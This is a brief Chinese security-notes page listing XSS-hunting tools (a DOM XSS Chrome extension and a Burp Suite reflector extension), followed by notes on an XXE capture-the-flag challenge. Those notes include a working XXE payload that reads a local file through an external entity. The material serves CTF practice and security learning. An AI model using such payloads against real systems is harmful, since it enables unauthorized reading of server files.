寻找XSS的辅助工具 chrome插件与 Burpsuite扩展

0kee Team 辅助工具

// 记得修改Chrome插件组

DOMXSS
0kee Team
https://0kee.360.cn/domXss/

Burpsuite 扩展

#工具# 在浏览网页的同时寻找反射型XSS:
https://github.com/elkokc/reflector
BurpSuite扩展

临时笔记

某XXE CTF
http://123.207.178.76:8103/
LMva

1
2
3
4
5
6
7
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/flag" >]>
<root>
<list>&xxe;</list>
</root>